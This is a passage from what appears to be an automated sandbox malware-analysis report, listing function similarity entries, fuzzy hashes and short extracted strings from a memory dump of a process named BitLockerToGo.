                                                                                    • Opcode Fuzzy Hash: c6c5228e0b3d99bb4fe49e8e5f77b92791fa7544ae884492db604a47cca9ae8e
                                                                                    • Instruction Fuzzy Hash: 73A1E47124C3919AC316CF3994A07ABFFE09F97304F48496DE4D55B382D339890AC7AA
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2609837960.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: A$B$C$D
                                                                                    • API String ID: 0-483099237
                                                                                    • Opcode ID: ca9659287533289adc6236492f1fc9de106d76657fbd2bb9f7c60c514b364a3f
                                                                                    • Instruction ID: 0a39cb7f803d4c185451d864b9e497c9f34c0258a9932171ab1266936fe19994
                                                                                    • Opcode Fuzzy Hash: ca9659287533289adc6236492f1fc9de106d76657fbd2bb9f7c60c514b364a3f
                                                                                    • Instruction Fuzzy Hash: 45E104215087D18ED326CB3C885875A7FA15B67224F0EC3DED4EA9F3E3C2649906C796
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2609837960.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: <=$<=$LGHI$CIE
                                                                                    • API String ID: 0-1119745755
                                                                                    • Opcode ID: 0bcdece6d7876d8268f25a05d73a559a7a36f50d7a9f8c677ce4e34470149156
                                                                                    • Instruction ID: 32d4a041f101078bd4bc94fa57d7e14e415041f5642be7670513e9c8a07ffdec
                                                                                    • Opcode Fuzzy Hash: 0bcdece6d7876d8268f25a05d73a559a7a36f50d7a9f8c677ce4e34470149156
                                                                                    • Instruction Fuzzy Hash: D591BCB594E3D08BD3358F2598913DBBBE1EBDA314F184A6DC4C95B382C7394506CB8A
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2609837960.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: 7$DCBA$gfff
                                                                                    • API String ID: 0-1442881509
                                                                                    • Opcode ID: b3ba1445c26da6b22707cc5d845a939713ff511ef573d9fdc1e342ac4297eebd
                                                                                    • Instruction ID: 9d9ef5e8d0571ec1439f7c8245e8eae240db84c2fe772280dd0b0067dd9d7dcc
                                                                                    • Opcode Fuzzy Hash: b3ba1445c26da6b22707cc5d845a939713ff511ef573d9fdc1e342ac4297eebd
                                                                                    • Instruction Fuzzy Hash: 19615471A187558BE314CF28C8417AB73D6EBC5314F48853EE486CB3D1EB7898468B86
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2609837960.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: 0$8
                                                                                    • API String ID: 0-46163386
                                                                                    • Opcode ID: 6dc858bbbfe624dfad55298dc1ff51f881e4ee94df4b44499febe866db10dfb7
                                                                                    • Instruction ID: b2012c2a1db2469c536b3b07072ca7f30576caaa2b6fce1d7d7eab69a15dbd8f
                                                                                    • Opcode Fuzzy Hash: 6dc858bbbfe624dfad55298dc1ff51f881e4ee94df4b44499febe866db10dfb7
                                                                                    • Instruction Fuzzy Hash: C37224716083409FD720CF28C884BABBBE1AF94354F14892EF9899B391D379D944CF96
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2609837960.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: hw$w|
                                                                                    • API String ID: 0-1849151029
                                                                                    • Opcode ID: 734342037324eacdd7391db1c3bf52b9f40376664cdccb21274471d1a9b12dfb
                                                                                    • Instruction ID: 7f53893ece1fc367e5dcc430f0afdbafb4e397ed581a73c08b8c5b99d3946130
                                                                                    • Opcode Fuzzy Hash: 734342037324eacdd7391db1c3bf52b9f40376664cdccb21274471d1a9b12dfb
                                                                                    • Instruction Fuzzy Hash: CFB1E2726583018BC7248F28C8916ABB7F2EFD1314F19891EE8D58B391E738D945C79A
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2609837960.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
                                                                                    Similarity
                                                                                    • API ID: InitializeThunk
                                                                                    • String ID: DCBA$DCBA
                                                                                    • API String ID: 2994545307-1149900676
                                                                                    • Opcode ID: 43de8c4e372fa503e4b09d65a03d7bdc6c6e33553bf5fec2d450fda97234a92d
                                                                                    • Instruction ID: cad3b259a4d5271c89c86f5350fb094d25bee5f73f2992c8f8494907ffb99dd6
                                                                                    • Opcode Fuzzy Hash: 43de8c4e372fa503e4b09d65a03d7bdc6c6e33553bf5fec2d450fda97234a92d
                                                                                    • Instruction Fuzzy Hash: 1A816A357493409FD7208B54C881BBFB392FBD9300F2A967DE58157252C3B5AC86CB9A
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2609837960.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: )$IEND
                                                                                    • API String ID: 0-707183367
                                                                                    • Opcode ID: 2881b4ab95deff7037094bb9981ba50bbf6e9b122f24e221426183cc0a5f93f0
                                                                                    • Instruction ID: 194417da5897dfdd8569b524203fd60a6839bd3452e51eb926db43034e282a80
                                                                                    • Opcode Fuzzy Hash: 2881b4ab95deff7037094bb9981ba50bbf6e9b122f24e221426183cc0a5f93f0
                                                                                    • Instruction Fuzzy Hash: 25D1C3B19083449FD710CF15D841B5FBBE4AB94308F14492EFA98AB3C2D779E908CB96
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2609837960.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: gbTS$|
                                                                                    • API String ID: 0-3306122945
                                                                                    • Opcode ID: 946224f028aee6afaee8bee1061b915f25f83cc3104a808cb51b38d008bb591f
                                                                                    • Instruction ID: 66e926ada81158d3c81f9cc5994b24db1a103964577c9991785ea437590cd516
                                                                                    • Opcode Fuzzy Hash: 946224f028aee6afaee8bee1061b915f25f83cc3104a808cb51b38d008bb591f
                                                                                    • Instruction Fuzzy Hash: 4971F47060C3E18FE3258B3594657ABBFD1AFA3304F58485ED5CA8B382D679480ACB57
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2609837960.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: gbTS$|
                                                                                    • API String ID: 0-3306122945
                                                                                    • Opcode ID: 6c786b22e9bd3a4d31d6c9a86c64b32c728ee3ac3597551b4e15a87be70e5b63
                                                                                    • Instruction ID: 95aadaac6a18563f864252b1717a0013fbfc28dbfdb71acaaba62654ed780ad6
                                                                                    • Opcode Fuzzy Hash: 6c786b22e9bd3a4d31d6c9a86c64b32c728ee3ac3597551b4e15a87be70e5b63
                                                                                    • Instruction Fuzzy Hash: 3571037060C3E18FE3258B3594657ABBFD1AFA3304F58485ED5CA8B382C679480ACB57
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2609837960.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: DCBA$DCBA
                                                                                    • API String ID: 0-1149900676
                                                                                    • Opcode ID: bf2593e8229e15667b3473caa24e4bb517f1db4510249c2af4b596899cd6d0a2
                                                                                    • Instruction ID: c2cd78a5a671f5814b5098cc66df09531db8575d81d7b2bfa9de18193e7548bb
                                                                                    • Opcode Fuzzy Hash: bf2593e8229e15667b3473caa24e4bb517f1db4510249c2af4b596899cd6d0a2
                                                                                    • Instruction Fuzzy Hash: 0711D6747083219FD7448F35A61063BB7E0FB9A314F54997DD59593341D2B898128F49
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2609837960.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: !
                                                                                    • API String ID: 0-113910852
                                                                                    • Opcode ID: bb484417d5c24dcc73e98fc77baf26d99336fd5d77112d4898e0e3c2de9af6f1
                                                                                    • Instruction ID: 2d693bce10ed5bc3cb733e123271110e610af88e73c885137d41ad325da0423d
                                                                                    • Opcode Fuzzy Hash: bb484417d5c24dcc73e98fc77baf26d99336fd5d77112d4898e0e3c2de9af6f1
                                                                                    • Instruction Fuzzy Hash: 00C14972A083208BD724DF24D85176BB3E2EFE0354F49452EE8C5973A1EB799D01839A
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2609837960.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: "
                                                                                    • API String ID: 0-123907689
                                                                                    • Opcode ID: 890805ae256df2394b4c992c8510d8c6f152f74533689e5e64bf7f5813ebe0a9
                                                                                    • Instruction ID: ba5bec7ee50c6a9e90924a2fc2af94bf927fb64befec74e61bb5d5638cdde794
                                                                                    • Opcode Fuzzy Hash: 890805ae256df2394b4c992c8510d8c6f152f74533689e5e64bf7f5813ebe0a9
                                                                                    • Instruction Fuzzy Hash: 39C14872B08321ABD714CE25E49076BB7D5AF84314F58892FE89587382DB3CEC45C79A
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2609837960.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: tq
                                                                                    • API String ID: 0-481023706
                                                                                    • Opcode ID: 29c9bf756c045eef1a09ef221ff720d3352d9421d4280291e27939b0caa909bf
                                                                                    • Instruction ID: 8f534a504f04a5d9767115eb01dd3f16783e7d924e47365cff2b2f91225dd44f
                                                                                    • Opcode Fuzzy Hash: 29c9bf756c045eef1a09ef221ff720d3352d9421d4280291e27939b0caa909bf
                                                                                    • Instruction Fuzzy Hash: 28A155B1B043118BD710CF60D881B6BB3E1FF94358F14892DE9898B3A1E779E905C75A
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2609837960.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: ~
                                                                                    • API String ID: 0-1707062198
                                                                                    • Opcode ID: b2bf56c6dda8e436477415f48bc884f7f9252947a21440a050ed132b55a9fa0b
                                                                                    • Instruction ID: 20d55060c47421e563f3ea782d842ae176eb6628bfb33178114c4445c7dce7b7
                                                                                    • Opcode Fuzzy Hash: b2bf56c6dda8e436477415f48bc884f7f9252947a21440a050ed132b55a9fa0b
                                                                                    • Instruction Fuzzy Hash: E7A13A729486214FC711CF28CC817ABBBE1AB95324F19863DE8A997391D738DC46C7C6
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2609837960.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: ~
                                                                                    • API String ID: 0-3734495848
                                                                                    • Opcode ID: 355a6c65d4879f889d726b7ad2c1a24d7495bdd07e2d78c9d59b1e122d21a961
                                                                                    • Instruction ID: 33279d1e474e6188c245f11beee1606a6891c7f1e75ded8a18e63065de0f733c
                                                                                    • Opcode Fuzzy Hash: 355a6c65d4879f889d726b7ad2c1a24d7495bdd07e2d78c9d59b1e122d21a961
                                                                                    • Instruction Fuzzy Hash: 8E911372A583208BC3248F14C8903ABB7B2FFD5744F5A856EE8C55B3A4DB359C42C756
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2609837960.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: ,
                                                                                    • API String ID: 0-3772416878
                                                                                    • Opcode ID: 5f2faef974116ec6b01a5155b5fcf0618d67d73967f2efe24fc229197e08a00c
                                                                                    • Instruction ID: 35cb39d69d440d3dd2cc247d0e9d645b9ebb41c3e8e543fb4a0ac07a1624e687
                                                                                    • Opcode Fuzzy Hash: 5f2faef974116ec6b01a5155b5fcf0618d67d73967f2efe24fc229197e08a00c
                                                                                    • Instruction Fuzzy Hash: 57B138711097859FD321DF28C88061BFBE0AFA9704F444A2EF5D997382D635E918CBA7
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2609837960.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
                                                                                    Similarity
                                                                                    • API ID: InitializeThunk
                                                                                    • String ID: DCBA
                                                                                    • API String ID: 2994545307-2222620526
                                                                                    • Opcode ID: 1087ef9790cd2e22a96d7d35d25c2d4ed028b503461a2e47b5b3afec9cb57cad
                                                                                    • Instruction ID: b5b8d8c5958f8a2392257b66407102ab0bea2b15514156534733f35bb6fab36e
                                                                                    • Opcode Fuzzy Hash: 1087ef9790cd2e22a96d7d35d25c2d4ed028b503461a2e47b5b3afec9cb57cad
                                                                                    • Instruction Fuzzy Hash: EB61E377F443119BD3288B998D9153BB693FBD8710F5F827ED88A63751C2B49C0282C9
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2609837960.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: WXY
                                                                                    • API String ID: 0-578357071
                                                                                    • Opcode ID: 9ac52ab9ea5249d440cfc6a24ea8c2da27a5e41fcfcff4567cf9a22dc44a9644
                                                                                    • Instruction ID: 8d25020bddb94e3cdd4bd6562285650216077dcd5e3e3cdbb1f9058a9d2ed0fd
                                                                                    • Opcode Fuzzy Hash: 9ac52ab9ea5249d440cfc6a24ea8c2da27a5e41fcfcff4567cf9a22dc44a9644
                                                                                    • Instruction Fuzzy Hash: 038104715083218BC724DF28C8906ABB7F2FFD5764F18895EE8C59B764EB349841CB46
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2609837960.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: 0
                                                                                    • API String ID: 0-4108050209
                                                                                    • Opcode ID: 9788781063624b3d0d3c335ec3d0ab6fb756623c7db389bba1591df65a192210
                                                                                    • Instruction ID: fe41006882c24f4a0456cb53abb896f387fe7fa6d710c33ad7f327e38dde6c28
                                                                                    • Opcode Fuzzy Hash: 9788781063624b3d0d3c335ec3d0ab6fb756623c7db389bba1591df65a192210
                                                                                    • Instruction Fuzzy Hash: 8DB15961108BC0CEE316CB39C888B567FD15B66318F4E82DDC1A94F7E3D6BA9509C726
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2609837960.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: DCBA
                                                                                    • API String ID: 0-2222620526
                                                                                    • Opcode ID: e97ef76f18b33331658c6dadffdbf4a03ec667c33888f79711ecf2f3b557a6d1
                                                                                    • Instruction ID: 872a48a09982231b8dafbd347f7c63a6ccfc1133244f06d7031620cbbfbec7ca
                                                                                    • Opcode Fuzzy Hash: e97ef76f18b33331658c6dadffdbf4a03ec667c33888f79711ecf2f3b557a6d1
                                                                                    • Instruction Fuzzy Hash: 73512632A047108BC7209E2C8C8165BF7E2FB8A324F19A67EE89497395DB789C45C7D5
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2609837960.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: ytyu
                                                                                    • API String ID: 0-3122247562
                                                                                    • Opcode ID: f053fbe5bc21165d167fab0e9e4a8a53879f261e0ed1905fc728f89db18bf12f
                                                                                    • Instruction ID: 12b0de02a6f5ab75272d138379b8755f22481c091a64ef22d8aed6e45f9efa9c
                                                                                    • Opcode Fuzzy Hash: f053fbe5bc21165d167fab0e9e4a8a53879f261e0ed1905fc728f89db18bf12f
                                                                                    • Instruction Fuzzy Hash: AA512B616083D14BD7298F3994A07BBBBD2DFD7304F5885BDC0D69B286CB3841068759
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2609837960.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: ytyu
                                                                                    • API String ID: 0-3122247562
                                                                                    • Opcode ID: 3494bfe6291a6431b01350dcad90491f8a54cb059fc7b75e339d49c7782d6889
                                                                                    • Instruction ID: 648daf82285625cf77c371538089869eb7515d56c2969b46c42d7a52f9289bc7
                                                                                    • Opcode Fuzzy Hash: 3494bfe6291a6431b01350dcad90491f8a54cb059fc7b75e339d49c7782d6889
                                                                                    • Instruction Fuzzy Hash: 27412D6060C3D24BD73A8F2994A47B7BFE1DFA3344F5885AEC0D65B242CB384506C75A
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2609837960.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: ytyu
                                                                                    • API String ID: 0-3122247562
                                                                                    • Opcode ID: cbca36ce238727ca39cac4ff67d5d0eb6a20784f1e8b4ad77352ae9aa64df1ca
                                                                                    • Instruction ID: 9f127353f7bba25dfea1de63524ab0f2f798c8a367a6f857e5b761ee54c0f219
                                                                                    • Opcode Fuzzy Hash: cbca36ce238727ca39cac4ff67d5d0eb6a20784f1e8b4ad77352ae9aa64df1ca
                                                                                    • Instruction Fuzzy Hash: 5C312A6060C3D24BD73A8F2994647BBBFE1DFA3344F5889AEC0D65B282CB344506C75A
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2609837960.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: !y{{
                                                                                    • API String ID: 0-1777749009
                                                                                    • Opcode ID: 34a11b86288b67153c8836f152e560bb3d0582ddd333178ec40e8e1900dbe185
                                                                                    • Instruction ID: 60daa59d1a784ae211c2b3ef0204a34bfe7960cd735750a74c34f91c64a24c52
                                                                                    • Opcode Fuzzy Hash: 34a11b86288b67153c8836f152e560bb3d0582ddd333178ec40e8e1900dbe185
                                                                                    • Instruction Fuzzy Hash: 912199729493508BC7148E29D8503E7FBE1EFD2314F1C84AFE8C5EB301E23988168796
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2609837960.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
                                                                                    Similarity
                                                                                    • API ID: InitializeThunk
                                                                                    • String ID: DCBA
                                                                                    • API String ID: 2994545307-2222620526
                                                                                    • Opcode ID: a3285eac4c9d0b2840b591ec952b068857be1a3abe61b60f757daffff14c0e29
                                                                                    • Instruction ID: 58c59863d1f9f3c4caf99bc5159be815190c9076244c5d1684e7e5d48b42dc26
                                                                                    • Opcode Fuzzy Hash: a3285eac4c9d0b2840b591ec952b068857be1a3abe61b60f757daffff14c0e29
                                                                                    • Instruction Fuzzy Hash: DF210474708212BFE6288B14DD41F3773A1F796324FA0862DE652A62D0D6F49C128B59
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2609837960.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: DCBA
                                                                                    • API String ID: 0-2222620526
                                                                                    • Opcode ID: 4c7d43c54ce5063488470e0d67501b2030e8c17e96c1585fe75e4ae10792527b
                                                                                    • Instruction ID: 54541ef06add59dfd3263f9efd68384cd03068db4430ffcf6da8f422e4931867
                                                                                    • Opcode Fuzzy Hash: 4c7d43c54ce5063488470e0d67501b2030e8c17e96c1585fe75e4ae10792527b
                                                                                    • Instruction Fuzzy Hash: 8D01D2303083909BD7249F05D89193FF7A2FBDA718FA5963DD58513622C779AC02878E
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2609837960.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
                                                                                    Similarity
                                                                                    • API ID: InitializeThunk
                                                                                    • String ID: DCBA
                                                                                    • API String ID: 2994545307-2222620526
                                                                                    • Opcode ID: 60381cf5c24a8d4759631cef9cffb6af330fb3cce93a0978c928fc436f60f342
                                                                                    • Instruction ID: 6d182deb88c2c4eb255f3f6f371a54bc81061c6ec6ac901c292e8a6fabbb1aac
                                                                                    • Opcode Fuzzy Hash: 60381cf5c24a8d4759631cef9cffb6af330fb3cce93a0978c928fc436f60f342
                                                                                    • Instruction Fuzzy Hash: F301D83034C2105FDB548B10D98187B7369EB5A75CF61661DF06623576C3749C078B5D
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2609837960.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: $(Ca
                                                                                    • API String ID: 0-3651910949
                                                                                    • Opcode ID: f3dc78d55f9b7432d2cfe76f020a771e01dd59afd2f47eff987ab0c26e84f887
                                                                                    • Instruction ID: a54c174fe026b402a79ebbd94ae73bc0dd6676e717bfd306ef8db5c792464231
                                                                                    • Opcode Fuzzy Hash: f3dc78d55f9b7432d2cfe76f020a771e01dd59afd2f47eff987ab0c26e84f887
                                                                                    • Instruction Fuzzy Hash: 7C1131301083819BCB199B25C811BBABBE09F97304F18486DF0D2D32E3DB398446C79A
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2609837960.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: DCBA
                                                                                    • API String ID: 0-2222620526
                                                                                    • Opcode ID: e73a60594a34896f126e9e1d7372bd15978939b8c7b289373e8439afa795e774
                                                                                    • Instruction ID: aedfb67314d9ebe2d71852c7ac7ec84794d1d19aed1dc7c2685d9c11a788c456
                                                                                    • Opcode Fuzzy Hash: e73a60594a34896f126e9e1d7372bd15978939b8c7b289373e8439afa795e774
                                                                                    • Instruction Fuzzy Hash: 7201A1357182109BD7488F64B44043BB3B2EFD6725F95696CE88263211C336ED42CB8D
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2609837960.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: DCBA
                                                                                    • API String ID: 0-2222620526
                                                                                    • Opcode ID: 6c572baec16290f9058c09b241c1d7d46c3f91507620d49c45c0cfc9c7b8572b
                                                                                    • Instruction ID: f6be957a4c6912d3bf47c9c5fa08e1818c84933d3de460471f0cc8570821c659
                                                                                    • Opcode Fuzzy Hash: 6c572baec16290f9058c09b241c1d7d46c3f91507620d49c45c0cfc9c7b8572b
                                                                                    • Instruction Fuzzy Hash: E1018C3870C2009BD7048F10E89143BB7B2EF92718FA5A57DE88627212C774DC028BAE
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2609837960.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: nt
                                                                                    • API String ID: 0-3989823987
                                                                                    • Opcode ID: 8f23375f3ded1cedf8c2b6c586e19495486d9110ee2f26202b7f1334f42557fb
                                                                                    • Instruction ID: 9a8167d43ed3aa6e80a9fffa86108335d32d45ce1e36d09d358efee2e21b3ab1
                                                                                    • Opcode Fuzzy Hash: 8f23375f3ded1cedf8c2b6c586e19495486d9110ee2f26202b7f1334f42557fb
                                                                                    • Instruction Fuzzy Hash: FA114876E163911BE314DB359C916EBB6E29B8A304F28853DD985D3382EA389811874A
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2609837960.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: DCBA
                                                                                    • API String ID: 0-2222620526
                                                                                    • Opcode ID: c171ce8634b65f3b72ab00d7978cc057f42bfaa1f1ed53675fa34d6148c0a6de
                                                                                    • Instruction ID: 517883da41b6e9bbcf1a327f50b4d8fcb30acbe5f397202542f823fa7dde89d0
                                                                                    • Opcode Fuzzy Hash: c171ce8634b65f3b72ab00d7978cc057f42bfaa1f1ed53675fa34d6148c0a6de
                                                                                    • Instruction Fuzzy Hash: 7BF0A73074C3104FD7548B20A19013BB3A1EB6F758F616A6DD0A667666C335C8078F9D
